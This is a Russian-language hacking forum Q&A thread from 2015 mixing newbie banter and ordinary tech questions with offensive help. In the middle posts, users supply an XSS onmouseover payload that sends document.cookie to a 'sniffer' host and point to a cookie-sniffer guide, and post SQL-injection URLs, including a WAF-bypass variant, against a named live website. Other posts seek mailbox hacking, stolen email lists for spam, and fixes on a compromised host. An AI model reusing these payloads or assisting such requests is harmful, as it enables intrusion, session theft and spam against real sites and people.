Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Задаем вопросы) (https://forum.antichat.xyz/showthread.php?t=425010)

Arboretum 10.05.2015 19:30

Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?

OxoTnik 10.05.2015 19:33

Цитата:

Сообщение от Arboretum
Arboretum said:

Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?

html это не язык программирования

но отвечая на твой вопрос, да существуют, а ещё я вчера видел мамонта, он бегал по радуге, и отдал мне мою плюшку.

MaxFast 10.05.2015 19:35

Есть ли шеллы на Brainfuck?

Alexandr II 10.05.2015 19:59

Цитата:

Сообщение от Arboretum
Arboretum said:

Смотрю тут батьки троллинга сидят. А ведь задал обычный легкий вопросик на который даже знал ответа, хотел какой-нибудь вопросик банальный к теме прицепить...

если знаешь ответ, зачем спрашивать? задавай вопрос, который тебя интересует, и будет нормальный ответ

BabaDook 10.05.2015 20:05

Цитата:

Сообщение от Arboretum
Arboretum said:

Ожидал что-то вроде "Мой вопрос" - "Ответ", "Следующий вопрос" - "Ответ"... Но нет, надо же обязательно прицепиться к каждому слову и начать великий срач...

html шелов нету.

Cthulchu 10.05.2015 20:36

Цитата:

Сообщение от OxoTnik
OxoTnik said:

да существуют

Не надо вводить в заблуждение людей.

Есть что ответить - ответь. Нету - не отвечай.

Для того, чтобы стебаться над новичками много ума не надо.

Епт, как смешно, html-шелл!

ЗЫ

формально HTML - это язык программирования.

tiger_x 10.05.2015 21:45

Объясните как использовать xss onmouseover= ?

Желательно с примером скрипта вытягивания куки внутри onmouseover.

faza02 10.05.2015 21:53

Цитата:

Сообщение от tiger_x
tiger_x said:

Объясните как использовать xss onmouseover= ?
Желательно с примером скрипта вытягивания куки внутри onmouseover.

примерно так:

Код:

Code:
onmouseover="(new+Image()).src='//sniffer'%2bdocument.cookie"


tiger_x 10.05.2015 21:57

Цитата:

Сообщение от faza02
faza02 said:

примерно так:
Код:

Code:
onmouseover="(new+Image()).src='//sniffer'%2bdocument.cookie"


Может глупый вопрос. А где сниффер взять?

BabaDook 10.05.2015 21:58

Цитата:

Сообщение от tiger_x
tiger_x said:

Может глупый вопрос. А где сниффер взять?

в интернете() google.de

faza02 10.05.2015 22:00

Цитата:

Сообщение от tiger_x
tiger_x said:

Может глупый вопрос. А где сниффер взять?

вот, например:

http://www.truehackers.ru/articles/p...sniffer-na-php

да любой из гугла можно взять по "xss sniffer"

faza02 10.05.2015 22:06

Цитата:

Сообщение от BabaDook
BabaDook said:

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.


Код:

Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))

так же пройдет UnIoN, только я вывод не нашел.

tiger_x 10.05.2015 22:07

Цитата:

Сообщение от faza02
faza02 said:

вот, например:
http://www.truehackers.ru/articles/p...sniffer-na-php
да любой из гугла можно взять по "xss sniffer"

спасибо

BabaDook 10.05.2015 22:12

Цитата:

Сообщение от faza02
faza02 said:

Код:

Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))

так же пройдет UnIoN, только я вывод не нашел.

Спасибо, такое наверное прокатит, там кодировка сбита, трудно будет искать вывод в исходнике.

Всё спасибо . Смотри

Код:

Code:
http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-


Mister_Bert0ni 11.05.2015 01:58

Цитата:

Сообщение от Arboretum
Arboretum said:

Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?

Увы HTML это не серверный язык а всего лишь язик гипертекстовой разметки...Так сказать визуализация страницы...SHELL-ы есть под те языки на которых работают WEB-сервера.На сегодняшний день мне известны asp aspx cfm jsp perl php - шеллы...Для примера можно заглянуть в /usr/share/webshells если пользуешся Kali Linux..

Mister_Bert0ni 11.05.2015 02:09

Цитата:

Сообщение от BabaDook
BabaDook said:

http://mr.lumbolka.ru/ru/index.php?id=-100+union+select
+user()+--+ -
403 Forbidden

Подскажите пожалуйста как сделать что бы запрос прошёл. Кодировал url кодировкой , делал бувер оферфлов но всё равно не проходит.


http://mr.lumbolka.ru/ru/index.php?i...rrent_user()))

vBr 11.05.2015 02:23

Вопрос,

Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?

Cthulchu 11.05.2015 02:38

Цитата:

Сообщение от vBr
vBr said:

Вопрос,
Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?

если в процессе взлома вам какм-либо удалось получить доступ к файловой системе, то да, вы имеете такую возможность.

Ваш К.О.

vBr 11.05.2015 16:04

Вопрос,

Раньше FireFox в гугле вобью что нибудь и бегаю по ссылка нажимал левой кнопкой мыши -влкдака открывалась отдельно, сейчас переходит сразу же по ссылки т.е не открывается отдельно, в настройках в Мозиле в разделе Влкдаки все проверил не че не нашел, не обновлял не менял фф, как это исправить? хочу как раньше что бы открывалась сразу новая вкладка,

Johnydriver 11.05.2015 16:07

Есть кто-то к кому можно обратиться чтобы взломал джаст или смарт сервис рассылок и достал оттуда свежые емейл адреса? (не для продажи, а для личного использования - спама)

Если да, подскажите к кому?

Babadyc 11.05.2015 16:09

Я тут нашел открытие в новом окне https://support.mozilla.org/ru/kb/na...ametry-vkladok

Надеюсь поможет, но такие вопросы лучше у Гугла спрашивать ))

vBr 11.05.2015 16:11

Цитата:

Сообщение от Babadyc
Babadyc said:

Я тут нашел открытие в новом окне
https://support.mozilla.org/ru/kb/na...ametry-vkladok
Надеюсь поможет, но такие вопросы лучше у Гугла спрашивать
))

нет это не то гуглю... безрезультативно

Johnydriver, запрещено в данном разделе.

решил свою задачу. это в гугле нужно было настройки нажать и открывать в новном окне - но будет открывать в новой вкладке

vBr 11.05.2015 16:47

Ребят подскажите,

osCommerce является полностью бесплатной cms? знаю что OpenCart бесплатная cms, в бушующим для интеграции с 1c-bitrix будут ли проблемы если выбрать движек и заточить шаблон под Opencart? или лучше с osCommerce работать?

2. Можно ссылку на "Бесплатные Cms Интернет Магазина" а так же "Русские Cms Интернет Магазина" на источник с habrahabr

Спасибо

Babadyc 11.05.2015 16:50

http://www.cmsmagazine.ru/catalogue/ пользуйся

bermix666 11.05.2015 19:12

Мой вопрос администрации форума, почему закрыты соц.сети раздел, ведь у вас там кидалы в темах предлагают услуги! За этим нужно следить и удалять этих мошенников. А конкретно ник

Ultrasss было заказано 1000 подписчиков и переведены деньги. Реакции ноль, на сообщения не отвечает. Могу скрины переписки приложить и перевода.

vBr 12.05.2015 05:46

Вопрос,

Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?

OxoTnik 12.05.2015 05:54

Цитата:

Сообщение от vBr
vBr said:

Вопрос,
Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?

кого ты там создал? ИМ ?

Если это интернет магазин то так и скажи, тут экстрасенсов нет!

Ответ на твой вопрос, да можно.

В каждой из платёжных систем, есть раздел с подробным описанием для сайта.

M_script 12.05.2015 10:28

Цитата:

Сообщение от bermix666
bermix666 said:

почему закрыты соц.сети раздел

В этой теме все написано - /threads/424907/ ("Для тех, кто только что зарегистрировался !!!")

Цитата:

Сообщение от bermix666
bermix666 said:

Могу скрины переписки приложить и перевода.

Если можете, почему не приложили?

Цитата:

Сообщение от bermix666
bermix666 said:

За этим нужно следить и удалять этих мошенников.

Проверить выполнение условий сделки, не участвуя в этой сделке, чаще всего невозможно. Скрины и логи легко подделать. Для проведения безопасных сделок на форуме есть сервис гарантов - /threads/63165/. Аналогичные сервисы есть у многих платежных систем. Например, Escrow.WebMoney - https://escrow.webmoney.ru/

M_script 12.05.2015 10:44

Цитата:

Сообщение от vBr
vBr said:

Создал ИМ, можно ли подключить все возможные платежные системы такие как Qiwi, Яндекс.Деньги Webmoney Visa/Master из перечисленых к Им, не использую робокассу, т.е не платить проценты?

Делай как все нормальные люди - закладывай в стоимость товара комиссию агрегатора.

Подключать отдельно мерчанты всех ЭПС выйдет дороже. А за прием Visa/MC процент придется платить в любом случае.

P.S.: В следующий раз пиши OS (online shop). Мы здесь очень любим загадки на телепатию.

vBr 12.05.2015 16:31

Подкиньте Ссылку, где можно просмотреть Сайт или Шаблон на Адаптацию, т.е просмотреть с Смартфона, с Ляптопа Планшета ТВ и т.д

Федор 12.05.2015 21:07

Здравствуйте. Подскажите как хешкет запустить oclhashcat 1.45 gui 044 карточка radeon hd 4300/4500 ос win7 драйвера 13.1 самые последние для этой карты. Ставил более ранние версии драйвера с 12.2,3,4,5 хвосты чистил DriverSweeper результат ноль. Hashcat выдает ошибку clBuildProgram -11. http://s003.radikal.ru/i204/1505/13/110f12eabc5e.png

Ronin457 12.05.2015 21:48

Всем Большой Привет!

Ищется инфа о акках (авторег) зарегины на номер +4

Какая та лайзейка вроде как есть там.

Спасибо.

п.с.можно в личку.

п.с.с.чуть не забыл! Пользовался услугой по покупке аков ВК, человек меня кинул.

Как мне его наказать?Все доказательства есть.Спасибо.

blaga 13.05.2015 07:36

Цитата:

Сообщение от vBr
vBr said:

Подкиньте Ссылку, где можно просмотреть Сайт или Шаблон на Адаптацию, т.е просмотреть с Смартфона, с Ляптопа Планшета ТВ и т.д

themeforest.net

blaga 13.05.2015 12:43

подскажите нубу, что за херня вылазит в phpMyadmin и как это пофиксить.

http://i.imgur.com/KXRAAsA.jpg

пробовал чистить куки помогает только на одну перезагрузку страницы, потом снова появляется.

Arboretum 13.05.2015 14:09

Цитата:

Сообщение от blaga
blaga said:

подскажите нубу, что за херня вылазит в phpMyadmin и как это пофиксить.
http://i.imgur.com/KXRAAsA.jpg
пробовал чистить куки помогает только на одну перезагрузку страницы, потом снова появляется.

Добавь в php.ini строку:

session.save_path = "C:/php/tmp" или

session.save_path = "/tmp"

И создай каталог C:/php/tmp

blaga 13.05.2015 14:14

Цитата:

Сообщение от Arboretum
Arboretum said:

Добавь в php.ini строку:
session.save_path = "C:/php/tmp" или
session.save_path = "/tmp"
И создай каталог C:/php/tmp

косяк в том что это на подломленном хостинге.

Arboretum 13.05.2015 14:18

Цитата:

Сообщение от blaga
blaga said:

косяк в том что это на подломленном хостинге.

FTP доступа нету?

Arboretum 13.05.2015 14:25

Без доступа вряд ли сможешь наладить это... Погуглил, не нашел других путей...

blaga 13.05.2015 14:32

Цитата:

Сообщение от Arboretum
Arboretum said:

Без доступа вряд ли сможешь наладить это... Погуглил, не нашел других путей...

спасиб, но пока вопрос открыт остался. не думаю что у админа такая же фигня, а я ведь под админскими правами захожу.

Viktoria 13.05.2015 21:03

Привет всем! Подскажите пожалуйста! Есть ли тут люди, которые могут помочь со взломом почтового ящика? заранее спасибо.


Время: 06:48